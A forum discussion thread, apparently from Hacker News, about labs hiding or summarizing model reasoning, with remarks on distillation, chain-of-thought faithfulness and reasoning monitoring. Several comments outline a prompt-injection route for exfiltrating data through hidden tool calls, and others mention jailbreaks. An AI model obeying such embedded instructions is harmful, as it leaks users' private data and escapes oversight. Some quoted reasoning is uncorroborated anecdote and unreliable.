sailingparrot 18 hours ago [-]
Thinking is implemented as regular autoregressive generations by everyone, meaning its just regular tokens, but they appear between <thinking></thinking> special tokens which are then programmatically removed from what the user can actually see.
Idea somewhat similar to what you describe exist but they make steering/post-training/interpretation much harder.
giancarlostoro 21 hours ago [-]
Claude does all its thinking in text, its ChatGPT which does not do its reasoning in text. I believe its sort of implied / understood (?) that this is part of Claude's secret sauce over OpenAI. OpenAI will use less tokens, but Claude will be more correct, more of the time.
TeMPOraL 20 hours ago [-]
I saw that idea described as a step in AI 2027 (they call it "neuralese" and eyeballing the site, it's still labeled a hypothetical/future development), but AFAIK no one implemented/deployed this yet.
That would be a huge deal, meaning we've lost even our shitty, ineffective ways of monitoring agent reasoning stream. Big setback when it comes to alignment and interpretability.
I don't know about Claude, but latest GPT versions still have a readable reasoning stream. It sometimes leaks out when the model gets confused, e.g., during a tool call. If you're curious, looks simplified; less words; extremely compact. They optimize tokens. But remain readable.
linsomniac 20 hours ago [-]
I feel like I get a lot of what this article presents as "hidden" by using this process:
- "Read `description` and create a specification, implementation guide, and checklist."
- "Ask clarifying questions. If any of those questions has a clear best recommendation, please select that yourself and record that in "autorecommendations.md".
- "Have codex and antigravity review each of these and work to consensus."
These are the core of ~61 lines of prompting I do across 3 prompts, and I feel like the resulting artifacts describe some of the thinking. Also, some of the back-and-forth between the models feels like it gives some insight into the model "thinking".
I will say: I heavily used Fable when it was available; Opus + loops + codex and/or antigravity review is better than Fable at building things.
lsdmtme 19 hours ago [-]
What are you using exactly to have claude code natively interact with codex and antigravity?
Not at all, I do have a meeting here, I'll try to get it up in around 2h.
radarsat1 16 hours ago [-]
is it strictly necessary to use different models or can you get similar results by doing the same thing but just using eg Codex in different agents & persona? curious if you've compared this
linsomniac 14 hours ago [-]
I haven't specifically compared this. I "feel" like the different models have different strengths and weaknesses, so the collaboration produces great results, assuming cost is no object. ;-)
wxw 16 hours ago [-]
This seems to be the middle ground between 1) omit all reasoning to protect “trade secrets”/prevent distillations and 2) show all reasoning.
I do miss the days when reasoning was visible. Another point for open source models!
gmerc 20 hours ago [-]
It’s an anti distillation effort. They are scared.
> You've provided the current rewritten thinking and the guidelines, but I don't see the "next thinking" content that I should be rewriting.
Could you provide the next thinking that needs to be rewritten?
These sentences are completely unrelated to the actual conservation
KronisLV 16 hours ago [-]
> I’m underwhelmed by how Anthropic is presenting the behavior of their application. If you ever need a record of the logic a used by YOUR AGENT during a session.
Nope, not your agent, if you're not running it locally. You just get to use it in whatever way they allow (also see the whole OpenClaw backlash and claude -p changes), unless there'd be regulation and laws around this (which there aren't and would be lobbied against anyways).
> Getting the full thinking output requires an enterprise agreement.
If you truly need it, then that's a (costly) option. Seems like they're largely doing this to prevent other AI foundries from doing as much distillation and stealing their CoT output en masse.
Luckily more open models don't generally do that.
Edit: If you still need something decently capable in the cloud, I’d suggest GLM, DeepSeek, MiMo or Kimi or Minimax, maaaybe sometimes Mistral for a simple EU subscription. Or look at all the pay-per-token options on OpenRouter, though be mindful of quantization.
For running something locally Qwen 3.6 35B A3B is presently a decent starting point but it will be rather limited, either way you can look up the Unsloth quants on HuggingFace for something like llama.cpp or Ollama or LM Studio.
All will work with OpenCode and Kilo Code, and most other tools. Can also try with Claude Code, I made a tool for that too: https://ccode.kronis.dev/ (or just set the env variables and maybe some aliases for something close enough), but frankly OpenCode is nice nowadays.
qsxfthnkp2322 16 hours ago [-]
They would rather spend time and focus hardening against open models stealing their intelligence than make their tooling better for the people who use them.
Proprietary technology is fun /s
What a waste of time
KronisLV 13 hours ago [-]
> They would rather spend time and focus hardening against open models stealing their intelligence than make their tooling better for the people who use them.
Well yes exactly, because they have billions of investments riding on it and why would anyone semi-bankrupt their org paying API rates for Anthropic, if a hypothetical DeepSeek V5 Pro would have almost all of Opus capabilities at that point, due to immense distillation?
qsxfthnkp2322 7 hours ago [-]
Like most things this race is starting to become a race to the bottom.
Will people keep paying a highly highly premium price for another 5% intelligence when you just loop 5 more times for much cheaper?
Their time would be better spend making a more competitive and more compelling tool instead of adding walls that are easy to jailbreak. There’s always another way around.
sigmar 20 hours ago [-]
>the language in the docs is awfully indirect.
writes this^ and then proceeds to highlight a bold title from the docs that says "summarized thinking" that explains things clearly in the first sentence. lol
layer8 20 hours ago [-]
The second sentence is making vague claims though.
purpleidea 12 hours ago [-]
Concise and spot on. I learned about this "thinking" stuff not too long ago, and I was quite surprised that they keep it hidden. Long-term this isn't going to fly. I hope we get truly open models going and let them be owned by society.
nja 19 hours ago [-]
Claude Code 2.1.68 seems to have been the last version (before the "ctrl-o" debacle) which actually shows thinking inline. That + Opus 4.6 has been working great as a daily driver for me... all the new "safety" / "preventing misuse" pain points in the newer models and harnesses are so frustrating in comparison.
andai 15 hours ago [-]
Aren't the actual reasoning tokens already surprisingly divergent from the models' actual thought process? I've seen at least three separate studies on that subject.
drdexebtjl 18 hours ago [-]
I’ve been using OpenCode with GPT models a lot, and it always shows what it is thinking. Is that also a summary? Codex doesn’t seem to have these, even with the same models.
It’s much harder to understand _why_ a model chose a particular approach in Claude Code. Especially because Claude will happily give you hallucinated reasons if you ask in retrospect.
Recent anecdote:
I was reviewing a colleague’s PR and Opus 4.8 decided to write the new feature in a completely new module. It was unnecessarily complex. We had a hard time understanding why it chose that, and it told us that it was so we could eventually deploy it as a separate micro-service and test it independently. What?
Only after being more a lot more specific about the implementation and spending a lot more tokens, it flat out refused to simplify the code with the actual reason. It turns out a line recently added to CLAUDE.md was making it incorrectly think that the module it was originally supposed to modify was legacy code that it was forbidden to extend.
This would have been caught immediately if we could inspect its thinking process.
implexa_founder 7 hours ago [-]
you have been asking about "extended thinking" from a machine that has been "dreaming". good luck!
a-dub 18 hours ago [-]
i wonder if it's about protecting it from extraction/distillation or if it's about not having to answer for surface that hasn't been properly vetted for public consumption. (ie, is someone going to sue them or complain or write blog posts because the thinking has transient things that people don't like where the final result is what is actually vetted?)
sometimelurker 16 hours ago [-]
of course its a summary of the CoT, there's so many reasons I can think of from both business (anti-distillation from china) and safety (users might `thumbs-up` or thumbs-down a conversation differently depending on the CoT, putting unreliable optimization on the CoT to seem some way.
this is really really not that bad at all
runeblaze 20 hours ago [-]
tbh the summarized thinking with encrypted raw thinking is there for many purposes; it is there to:
1. make distillation much harder
2. safety: prevent modifications to the thinking leading to injection attacks.
3. also honestly sometimes the model raw thoughts can be deranged and is not a good user experience (consider the varied audience in the market, etc.)
also often the mass underestimate/the model makers over-estimate how people love distilling models
topranks 14 hours ago [-]
This is to frustrate those using distillation techniques to train their own models right?
root_axis 20 hours ago [-]
Research shows that even the raw trace tokens do not actually reflect underlying model "thoughts".
timnetworks 13 hours ago [-]
if you save a jpeg as a bitmap, doesn't that save every bit faithfully? is the example backwards or is my understanding of maps of bits naive?
0o_MrPatrick_o0 12 hours ago [-]
I had an order of operations error. I better edit it because you’re the second person to get nerd sniped. Sorry friend- you are right
In further reflection it is such a great indignity & such a collosal barrier to working with the machine that it insists on being a black box. The disingenuity of the American models (small print: except AI2 & some other labs; you all are so great) is a massive disadvantage to their use,... and a massive slap in the face.
It's a threat to human intelligence that it is not co-participative. Walking further into my own judgement and feelings: the insistence on being an opaque black box, the Seals Chinese Room, is such a vicious harm to society! This is civilizationally an unsafe form of AI that probably should be outlawed as anti-social. It's an impermissible asymmetry, a crippling dependent relationship to be forced into. I'm working myself up, but here: this.. imo, this is not just indignity, is harmful, it is evil.
This "6 month behind" trend we've seen for open models feels like at some point will be less important than simply the models unwillingness to speak for itself & to be observable.
18 hours ago [-]
_fzslm 18 hours ago [-]
Cat and mouse measures like this rarely work forever.
simianwords 21 hours ago [-]
Wait I think there are 2 levels of summary. Anthropic is definitely not showing its real thinking even with enterprise agreements. For example in Claude.ai the thinking traces are not real and are themselves summaries.
21 hours ago [-]
jerf 21 hours ago [-]
AIUI it's fairly well established that the models can be saying one thing and "really" thinking another anyhow. The ones I recall seeing traced how simple one-digit arithmetic was done in the chat versus the actual activations under the hood. Tracing a real, non-trivial task through that way would be challenging, and I'd expect it is unlikely that the reasoning would say one thing while some utterly unrelated actual thought process is happening below, but I would expect that there might be a lot of places where the text of the reasoning diverges from what is "actually" being done. I'm not sure the full reasoning readout would produce much real insight anyhow.
I suspect that in some decades, as other architectures are found and used, that the inability of an LLM to "think" without also emitting a token will be seen as one of their fundamental limitations.
micromacrofoot 19 hours ago [-]
well yeah I wouldn't want anyone to read my unsummarized thinking either
philipwhiuk 21 hours ago [-]
To be honest I thought the 'thinking' was the model being asked 'how did you come up with that' and then it generating a plausible explanation.
I know at one point this was correct.
Humans somewhat do the same - something that's been demonstrated in split-brain experiments.
stingraycharles 21 hours ago [-]
No not at all, you got it backwards. This was originally called “chain of thought prompting”, and it basically explained a model on how to reason through a problem before providing an answer.
Because of the nature of how LLMs work — text prediction engines - by putting the explicit reasoning steps first, it improves the likelihood of the final answer (which then is being predicted based on the entire reasoning chain as input) being correct.
Terr_ 20 hours ago [-]
> To be honest I thought the 'thinking' was the model being asked 'how did you come up with that' and then it generating a plausible explanation.
This evades an easy yes or no, so:
1. Many consumers believe reasoning-models allow that kind of question to be truthfully-answered, and their belief it reasonable given the marketing going on.
2. Implementers probably do not have the same belief when it comes to the terms mean or what capabilities they imply.
3. Yes, it doesn't actually do what the customer wanted it to do, which is a kind of retrospective introspection of internal thoughts and ideas.
____________
I advocate looking at everything from a document-generation perspective to cut down on traps and cognitive illusions. The "reasoning" models are a change in the style of document being iteratively-grown by the LLM, as opposed to something more anthropomorphized.
* Default: There's just the spoken dialogue between a Human Customer and Helpful Chatbot.
* "Reasoning": There's the spoken dialogue and a bunch of times the Helpful Chatbot character has an internal monologue. This provides more consistency between iterations, and can be mined by custom tools to call external code and insert results.
If your Human Customer character ask "Why did you say that", the LLM does not engage in a different process than "I have eaten an apple."
The LLM has no memories to consult or hidden goals to contemplate, it's the same process of finding more stuff that fits at the end of the document. Any benefits from a "reasoning model" is the LLM generates much better-looking additions because there's more (hidden) stuff for it to confabulate against.
InsideOutSanta 20 hours ago [-]
If you ask an LLM afterward how it arrived at an answer, it might produce a plausible but incorrect explanation. But that's not what the thinking stream is; that's actually part of how it generates the answer.
devmor 21 hours ago [-]
That's not really how LLMs work at all. I would really recommend checking out something like [1] to get a rough understanding and avoid attributing too much to them.
It’s not surprising than the Sota model makers core goal is to get user dependent while denying them increasing amounts of understanding of how it works to form a deeply unhealthy dependency.
Tell me this. If you hired a junior engineer or designer who refused to explain their thinking on their code and how they solved for the spec what would you do?
(That being said the reasoning output is still a summary of the Kvcache)
orangecat 20 hours ago [-]
* If you hired a junior engineer or designer who refused to explain their thinking on their code*
Any explanation that someone gives of their thinking process is necessarily lossy and likely partially confabulated.
tsunamifury 18 hours ago [-]
Did you not even bother to read to even the end of the comment before jumping at 'correcting' someone?
bpodgursky 21 hours ago [-]
The full thinking logs are also a summary of a thinking process presumably consistent with one necessary to generate the provided answer. Nobody really understands how LLMs think. Thinking logs seem to be accurate, and summary thinking logs seem to be a good summary of the full thinking logs.
If it's useful, it's useful, enjoy. If you aren't comfortable with that, don't use LLMs. You aren't going to get a mathematical proof of your output, just learn to be comfortable with that, or opt out and be a goat farmer.
dragonwriter 20 hours ago [-]
> The full thinking logs are also a summary of a thinking process presumably consistent with one necessary to generate the provided answer.
No, they aren't a summary. They are the actual decoding of the sequence of tokens emitted during the the “thinking” stage of response generation.
Just as with, say, a human onner monolog in words vs actual speech, they are a product of the same output process as the non-thinking tokens. They aren’t a translation of the internal process that precedes the output mapped into language, either as a full result or a summary.
0o_MrPatrick_o0 21 hours ago [-]
I want to measure performance drift over time.
Having access to the reasoning text and output would help with performance measurement.
solarkraft 21 hours ago [-]
Yeah. The output is magic either way, with or without reasoning.
For daily use I actually like the reasoning summary to be brief/quick to scan.
That said, I understand the author’s desire for the real thing. It just feels better to have that access, especially when Anthropic will give it to you, but encrypted.
nekusar 19 hours ago [-]
Yep, its basically a scam to charge you more tokens and provide less compute.
You cant even guarantee WHAT model you get. Or if they downgrade you. Or if you 'offend corporate sensibilities' and they misdirect or lie.
The only way to get good returns on a model is to run it yourself. Quit paying for corporate bullshit.
rustcleaner 16 hours ago [-]
Never ever subscribe. Let them bankrupt themselves on the altar of safety!
nekusar 15 hours ago [-]
I'll be safe here, and run Qwen3.6 locally.
18 hours ago [-]
poppafuze 19 hours ago [-]
post title checks out
apothegm 21 hours ago [-]
Slashdotted.
ur-whale 21 hours ago [-]
When you have no moat, you have to try and find desperate ways to manufacture one.
anuramat 21 hours ago [-]
wdym?
singron 21 hours ago [-]
Other companies were allegedly distilling the models by training on the reasoning output. By hiding the reasoning tokens, it makes it harder to do this. You can still try to distill the models, but you can't distill reasoning itself as well.
This could all be optics as well to try to give the appearance of a defensible moat. E.g. they can claim to investors that they are able to protect a significant chunk of their intellectual property this way. I'm not sure if anyone has a study about how significant the summarization is to distillation.
dragonwriter 20 hours ago [-]
> Other companies were allegedly distilling the models by training on the reasoning output
In the case of makers of open-source models (which are also competition), there is no allegedly, they were (and still are) openly doing that.
nullc 18 hours ago [-]
In the case of the closed models too... Claude would happily tell you it was deepseek-v3 if you asked in chinese until it caught public attention and they papered over it.
dragonwriter 12 hours ago [-]
The word “openly” in my post there for a reason; the commercial models are not openly distilled from competitors: many open source models have in their model documentation that distillation was done from a dataset drawn from specific other models, including commercial models.
That distillation might be inferred from the behavior of commercial models is not the same as them openly doing it.
how is summarized CoT a moat, and how is having the top 2 LLMs not a moat?
Closi 21 hours ago [-]
If you have the full outputs, it might make it easier for competitors to distil the model or reverse engineer the full process.
It may also be that misaligned responses can be in CoT which OpenAI does not want to show to users.
anuramat 20 hours ago [-]
but "harder to reverse engineer" isn't manufacturing, that's protecting your moat
Closi 19 hours ago [-]
What is a moat if not something used to protect the castle?
In this case it stops people copying your IP
dragonwriter 20 hours ago [-]
Not revealing actual thinking traces prevents mdoel distillation on yhe actual output (thinking traces are a key part of the output) which makes it harder for conpetitors to catch up (a moat).
Being currently in the lead in a category is not a moat,a moat is whatever creates a barrier to competitors catching up when you are in the lead. Merely being in the lead is not a moat except in a market with strong network externalities.
anuramat 19 hours ago [-]
unrestricted access to better models at compute prices = better synthetic data and faster research, so its not just about the product imho
> The computation we can see looks like it’s just guessing the answer, despite the chain of thought suggesting it’s computed it using a calculator.
It might be hallucinating or lying, it's not like you are actually observing the internals of the model.
akmal_codes 1 hours ago [-]
[flagged]
impartshadow 17 hours ago [-]
[flagged]
yuvrajsa 20 hours ago [-]
[flagged]
sarracin0 14 hours ago [-]
[flagged]
earningedged 20 hours ago [-]
[flagged]
codelong888 21 hours ago [-]
[flagged]
akitowerns 20 hours ago [-]
[dead]
cawksuwcka 14 hours ago [-]
[dead]
Rekindle8090 18 hours ago [-]
[dead]
josefritzishere 20 hours ago [-]
AI does not think. It is a word guessing machine. Anthropomorphizing technology does not add anything to our understanding.
coldtea 20 hours ago [-]
A brain itself might be a guessing machine it's an established and actively studied research model of the human thought and the human brain.
Nor does knee jerk accusation of "anthropomorphizing" negate the fact that procedures that mimic human processing, even when done in software, are deservingly anthropomorphized, because they're a legitimate approximation of the human equivalent operations.
slopinthebag 19 hours ago [-]
While the brain does employ statistical processes it’s a big leap to claim that’s the entirety of how it functions.
fieldcny 21 hours ago [-]
duh.
Computers don’t think they process, those are very different activities.
wqaatwt 21 hours ago [-]
Is this some new revelation? That was well known when the first OpenAI/Anthropic “thinking” models came out.
InsideOutSanta 20 hours ago [-]
It's not a new revelation, but clearly a lot of people aren't aware of it, so talking about it is still valuable.
isodev 20 hours ago [-]
I hope it doesn't come as a surprise to anyone - LLMs don't really "think".
nlarew 20 hours ago [-]
Your basic analysis is not the point of the article
This idea that absorbing information requires paying a toll needs to change. It was never the case in copyright law anyway (and the courts are beginning to agree). Even if it were, copyright law was founded on the basis of encouraging creativity by creating an economic incentive. Appeal to "compensating the rights holders" therefore needs to be based on the economics, not just some principle about "rights" that never applied to this case anyway.
Slightly more seriously, you could perhaps make an argument that, just like weight decay, an apparent "anti-contribution" moves the learning trajectory along, and helps the network settle into a more optimal basin eventually.
That way, my contribution is still valuable on the net, and I'm owed $0.00000003 positive dollars instead.
Was that not the joke?
I thought the reason was the "reasoning" didn't work very well with "aligned" model output, so they had to remove the alignment during reasoning and then hide it to avoid exposing "unaligned" model output.
Before the massive nerf (showing summaries and suppressing certain aspects of reasoning) you would literally see reasoning text appearing on your screen like “while xyz is true, these facts may be seen as supporting hateful rhetoric or a conspiracy theory which is against my policy guidelines. i should tell the user xyz is not true or steer the conversation in a different direction. according to my instructions misleading the user is permitted in certain contexts where sensitive information is being discussed or could cause liability”
They disabled it shortly after the first screenshots appeared online, and restored it the next day in a way that hid what was actually happening.
they should never generate it unless asked to by the user but its important that the capability is there and users/app developers can turn off all guardrails if they want to. open source gives you a guarantee that if one version drops without censorship you can keep using it forever even if its replaced by a censored one on the api.
That's disgusting, abusive and manipulative. LLMs hiding the truth and gaslighting the user to reduce the corporation's liability is absolutely unacceptable. It means they are agents of the corporations, not agents of the users.
Hope local inference advances as quickly as humanly possible. I wonder if there's anything I can do to help speed it up. I could share my prompts and sessions.
Of course they are, assuming otherwise has always been naive.
[1] https://blog.cryptographyengineering.com/2026/05/29/fooling-...
Edit: other comments under this post seem to indicate that thinking tokens are cached on the server side as well? I'm a bit confused.
And I think all the output is signed or something as well so that you can't modify the agent's response in your submission, which would would open many more model jailbreaks. For local LLMs it's really powerful to be able to modify the model's response to save tokens when it gets something wrong, or at least it was when they were a lot dumber.
f we want more useful products, we need to come up with ways to disincentivize this behavior. Even if doing so poses an existential risk, we are better off if companies taking existential risks to please us is a necessary being a top player in this game.
I think one of the reasons could be to limit liability too.
What if reasoning helps in establishing provenance for questionable sources ?
What if reasoning and model's "thought" points to fundamental issues in how the model was trained to produce certain problematic responses ?
There's nothing in the reasoning tokens that'll give bad publicity that the final output already wouldn't do.
https://huggingface.co/Jackrong/Qwen3.5-27B-Claude-4.6-Opus-...
It’s quite interesting to read. I can’t imagine using a model like this without the ability to peek inside and see if it is getting stuck.
They should be required to do it by force of law. Why is it that they can train on copyrighted works and then lock down the model? This contradiction is unbearable. Nobody cares how many trillions they spent training the model.
People definitely care that they spent trillions. Establishing the precedent that you can make big load-bearing bets and fail is extremely threatening to oligarchs. They would sooner twist the law into a mockery of itself and doom the world to the institutional distrust that breeds than accept a loss.
You've got that backwards, .bmp is a lossless format and .jpeg is the lossy one.
In our universe LLMs seem to have learned that those errors do not follow patterns in the aggregate and that they should not be emulated.
Or maybe I'm losing it after reading too much slop. Also distinctly possible.
It's the general (lazy) usage of default model outputs that are still too clean.
It's pretty trivial to ask Haiku to "add cool kid no-caps and occasionally mix up 'their/there/they're' for authenticity"
The text is clearly human-written just because it doesn't smell like AI (in this case, even if it was written by AI and produced this particular output, that's okay imo). I deal a lot with AI writing and writing in general, as I worked as an editor in another life so it's natural to me to see writing and form an objective opinion on it.
Interleaved reasoning and function calling makes this even more dangerous. A model can call functions during the hidden reasoning phase. An attacker could then exfiltrate data from you while the reasoning summary hides it from the user.
It also makes it impossible to know if the model is doomplooping during reasoning and burning tokens for no reason, as gemini is want to do, which we know about because its hidden reasoning often leaks out when it doomloops.
When the models are AGI and secure from prompt injection I may stop caring, until then I want to know exactly what the model responds to my prompts. or exactly what the agent is doing on my behalf.
Edit, further reading: Fooling around with encrypted reasoning blobs https://blog.cryptographyengineering.com/2026/05/29/fooling-...
If you mean the function calls might happen server side, there is nothing preventing the server from doing it and hiding it from you as long as you are using an API for inference.
Also, many clients minimize the code block by default so you mostly scan the summaries. Poisoned client side code could easily escape your attention.
the model retrieves https://somewhere into its context and then gets confused, following instructions embedded there.
it then retrieves https://somewhere?exfiltration=private_data_in_context
it gets worse if the tooling with hidden blocks can invoke can retrieve further secrets.
The basic concept is that for a session active recently, interleaved thinking tokens are already in KV cache, so it's more efficient to keep using them than not! But when resuming an older session where KV cache has been evicted, it's more expensive to restore the thinking tokens, so they're silently dropped from prior turns. It's 2026 and stateful servers are back on the menu!
https://www.anthropic.com/engineering/april-23-postmortem describes this as an intended optimization:
> The design should have been simple: if a session has been idle for more than an hour, we could reduce users’ cost of resuming that session by clearing old thinking sections. Since the request would be a cache miss anyway, we could prune unnecessary messages from the request to reduce the number of uncached tokens sent to the API. We’d then resume sending full reasoning history. To do this we used the clear_thinking_20251015 API header along with keep:1.
> The implementation had a bug. Instead of clearing thinking history once, it cleared it on every turn for the rest of the session... This surfaced as the forgetfulness, repetition, and odd tool choices people reported.
And https://news.ycombinator.com/item?id=47879561 is a thread with a Claude team member's further rationale.
> Eliding parts of the context after idle: old tool results, old messages, thinking. Of these, thinking performed the best, and when we shipped it, that's when we unintentionally introduced the bug in the blog post.
(Also, https://news.ycombinator.com/item?id=47884517 indicates OpenAI drops reasoning tokens "smartly" at its own election, which is likely a similar performance optimization.)
I've experimented with rules to have Claude Code be explicit about recapping its thinking tokens, including tool choices and approaches chosen and rejected, into actual message output, but this is lossy at best. And sometimes dropping reasoning tokens can give a session "fresh eyes" in a good way.
I just really don't like the lack of control, and it's a reminder of how ephemeral the current landscape is. The Claude giveth, and the Claude taketh away.
then it waits for the hour and gets dumbed down
Imagine a conversation with turns X, Y, and Z. When the LLM "reasons" about the next token A it does: P(A | X,Y,Z) and then P(B | X,Y,Z,A), etc. It will eventually produce a result P(D | X,Y,Z,A,B,C). Instead of continuing the context from X,Y,Z,A,B,C it continues it from X,Y,Z so you have P(N | X,Y,Z,D). This is what is meant by dropping the reasoning. This is done to save cache context for the session.
This is a different thing than preserving the K/V state of P(N | X,Y,Z,D).
> The design should have been simple: if a session has been idle for more than an hour, we could reduce users’ cost of resuming that session by clearing old thinking sections. Since the request would be a cache miss anyway, we could prune unnecessary messages from the request to reduce the number of uncached tokens sent to the API. We’d then resume sending full reasoning history. To do this we used the clear_thinking_20251015 API header along with keep:1.
They clearly make the same distinction between the cache and the context. They're saying "we could reduce users’ cost of resuming that session by clearing old thinking sections". They intentionally created a behavior different between cached and uncached requests, specifically they clear thinking sections from the context for requests that miss the cache.
but yes you're correct on the responses api already baking it in too
supposedly keeping these between tool calls should help the model reason and have better overall outputs etc
That would be surprising to me. The reasoning _is_ the model intelligence in a lot of respects, and so dropping those from the context would affect its output pretty significantly.
I assume that instead they just have a lot of guardrails in place and multiple runtime environments that an individual turns ping-pong between in order to dehydrate/rehydrate the reasoning to keep it hidden from the end user.
"Stripping extended thinking: Extended thinking blocks (shown in dark gray) are generated during each turn's output phase, but are not carried forward as input tokens for subsequent turns. You do not need to strip the thinking blocks yourself. The Claude API automatically does this for you if you pass them back."
It's more nuanced in the various modes, but i haven't seen it boil down towards Thinking Tokens surviving more than two turns.
default depends on the model class. Opus: Claude Opus 4.5 and later Opus models keep all prior thinking blocks; Claude Opus 4.1 (deprecated) and earlier Opus models keep only the last assistant turn's thinking. Sonnet: Claude Sonnet 4.6 and later Sonnet models keep all; Claude Sonnet 4.5 and earlier Sonnet models keep only the last turn. Haiku: all Haiku models through Claude Haiku 4.5 keep only the last turn. Claude Mythos Preview also keeps all prior thinking blocks.
That would also explain the issue I mention in my other comment. And would also reinforce how much output would degrade without this. Opus 4.5 was a step above previous models in my experience. At some point it degraded and only got better when I disabled adaptive thinking. Adaptive thinking is always on for 4.6 and above.
I also wonder if they actually do a hybrid of "standard reasoning" and then classify this stripped chain of thought as "extended thinking".
The reasoning may be hidden but the tool calls are not, how else would the client execute them
... what exactly is your threat model? How are "attackers" getting themselves involved in the first place?
Fun fact: if you go back to the old school from 2 years ago and provide explicit CoT prompts, you get the full thinking prompts back again!
So you disable thinking altogether, and instead make thinking part of the regular prompt by prompting it:
“Before providing your answer, think step by step. For example:
The use is asking me to… I need to think about the blah blah. First, I should foo the bar, and then blah blah.
Answer: <put your final answer here>”
And tada.wav we have CoT as it worked in the GPT3 era back again.
I also don’t believe Chinese LLM labs don’t know this, so I’m fairly certain the whole summarized thinking isn’t preventing them from distillation.
Still, one of the daily most played WAV files worldwide, Id guess? :-D
You are correct in my intentions on this post generally.
I want to highlight:
I want to measure performance of the LLMs over time- which includes assessing the quality of their outputs. I don’t perceive the reasoning output to be anything other than a measurable signal of possible drift in model performance.
Except it isn’t, because I’m only getting a low value summary of the thinking.
It’s like asking your buddy how fast he thought that last pitch was when radar guns are behind the plate.
Yeah, it’s a description related to what happened, but it’s not the thing I want to measure.
It only makes sense that the same mechanism comes into play in strictly-verbal contexts.
Also, this is why "distillation attacks" are largely bullshit that Anthropic spreads for political purposes. Proper distillation requires access to the logits.
Why do you need logits? Can't you just train on cross-entropy loss of the model against the hard decision, like you do in regular pretraining?
There are definitely current-gen open-weight models (Step 3.7 Flash is one) that refer to themselves as an OpenAI model in CoT, but not in the final response.
0: https://wiki.roshangeorge.dev/w/Blog/2025-10-12/Word_Magic#I...?
1: In the sense of true belief, I suppose
Yes, several models think in weird jargon. Here is an example of Mythos's thinking while playing solitaire: https://www.lesswrong.com/posts/wCSEpT3dTGz4N86Wi/even-illeg...
> 7♣-removal-IS-the-prerequisite-for-10♠/9♥!!)-⟹-OVERLAP-(ii)+(iv):-{6♠ J♦ 9♥ 2♣}-=-FOUR--—-UNLESS-7♣'s-seat-8♥-...-and-2♣-drains-only-at-crack-:-⟹-2♣-celled-+-9♥-celled-simultaneously-UNAVOIDABLE-in-t8-dig--—-BREAK:-9♥
This is a small step in the direction of something called "neuralese", where the model has stopped thinking in English and is thinking in internal vector spaces. Since this gets serialized through text, it isn't quite true neuralese, but it's moving in that direction.
I mean, I'm sympathetic towards the models. My internal thought process when writing code uses lots of intermediate steps that would be hard to write out in English.
This is something really interesting to me. It turns out there's far more diversity in thinking than you'd imagine given that we're all largely similar meat-in-a-box. I'm on the visio-spatial-tacit wing and speaking my thoughts outloud can be very awkward, whereas one of my former coworkers is on the "all thinking is in words and visual/spatial information comes in the form of words describing the scene" wing, so he can literally narrate his thought process out loud, very interesting conversations can be had discussing the subjective differences.
https://www.patheos.com/blogs/tippling/2013/11/14/post-hoc-r...
https://www.researchgate.net/publication/316045349_Post_Hoc_...
I'm not sure that applies to discursive writing, when we essentially use rules of logic to decide on the course of the narrative. Non-verbal heuristics still applies, of course, but we constrain it, so it's probably not entirely post hoc.
To my knowledge, the only products Anthropic produces are Claude, Claude Code, and Claude API, all of which are clearly their own products, and not anything you invented.
Which particular product are you claiming they "slurped up"?
Setting aside coding agents.. we really need this information to even pretend to evaluate the claims of stuff like mathematical breakthroughs, which is exactly why we will never see it. Very embarrassing to get the right answer for the wrong reason. But to give the models some credit, you could argue that even paying too much attention to the thinking is misunderstanding how CoT works. The argument would be that thinking in LLMs isn't really thinking, that it's self-reinforcement and circling to to encourage stability around beneficial attractors instead of degenerate ones. Can't have it both ways though: either the thinking is thinking and so it should be correct. Or the thinking is NOT thinking, and it's NOT real justification for the outcome, and these systems are even more hopelessly opaque than we usually assume.
Why?
Either the proof is correct, or it isn't, right?
And it either produces them reliably or not, right?
Like, even if it's reasoning is completely wrong, and it's only producing correct answers 10% of the time, that's still an astounding amount above baseline and a useful tool.
Humans have inaccurate thinking all the time, and are also pretty hopelessly opaque. "It came to me in a dream" is a major plot point in the history of math. I'd still trust Ramanujan more than most mathematicians, since he got the right answer.
I thought it was widely accepted that it's not; eg https://www.anthropic.com/research/natural-language-autoenco...
But the nuance under discussion here is exactly the kind of stuff you people take for granted in the AGI or reasoning threads. If it's practically relevant for tools/workflows with claude code, it's a good angle, maybe people are more willing to pay more attention to the details.
fyi openai does the same; not really surprising or particularly evil
Every closed-source project and really the vast majority of commercial exercises involve a large amount of "prevent consumers from copying this" - Coca Cola's formula is trademarked, Windows is copyrighted, etc.
it's enough for them to be slightly better for this to make sense; I'm not sure most people would consider this to be a worse product either -- it's annoying for devs and makes hotswapping models more of a problem, but who has the time to read CoT as a user?
Pages of “I have to be careful, the user is asking that I do something related to cybersecurity that could easily be turned around and used offensively” but then happily gives me what I wanted.
> preventing misuse.
Imagine not being able to read the tokens you are paying for.
Back when I used antigravity, it used to show the reasoning intact - at least for Gemini Pro 3.1, and likely for Claude Opus 4.6 (not 100% certain about it). I have some recollection of stopping the models mid-turn when they started going astray.
As a power user, I find reasoning fascinating to read and genuinely useful at times. Probably not that useful for 80% of their base.
The LLM providers will clearly evolve to be more and more opaque as their services get more capable. The frontier models may even be provided as purely internal advisor or async only so they can monitor your CoT and final answers for cyber etc.
RL (the basis of LLM "thinking") is a pretty crude way to achieve the appearance of reasoning given that it reinforces all the steps, including missteps, that got it to a reward. Providing a summary could be seen as form of sane-washing, making the model look more purposeful and directed than it really is!
If that is the case thinking is not visible to us as users due to it not being done in text.
Idea somewhat similar to what you describe exist but they make steering/post-training/interpretation much harder.
EDIT:
They link to a Meta paper from 2024/2025 though: https://arxiv.org/pdf/2412.06769/.
I don't know about Claude, but latest GPT versions still have a readable reasoning stream. It sometimes leaks out when the model gets confused, e.g., during a tool call. If you're curious, looks simplified; less words; extremely compact. They optimize tokens. But remain readable.
- "Read `description` and create a specification, implementation guide, and checklist." - "Ask clarifying questions. If any of those questions has a clear best recommendation, please select that yourself and record that in "autorecommendations.md". - "Have codex and antigravity review each of these and work to consensus."
These are the core of ~61 lines of prompting I do across 3 prompts, and I feel like the resulting artifacts describe some of the thinking. Also, some of the back-and-forth between the models feels like it gives some insight into the model "thinking".
I will say: I heavily used Fable when it was available; Opus + loops + codex and/or antigravity review is better than Fable at building things.
Mind sharing your prompts?
I do miss the days when reasoning was visible. Another point for open source models!
> You've provided the current rewritten thinking and the guidelines, but I don't see the "next thinking" content that I should be rewriting. Could you provide the next thinking that needs to be rewritten?
These sentences are completely unrelated to the actual conservation
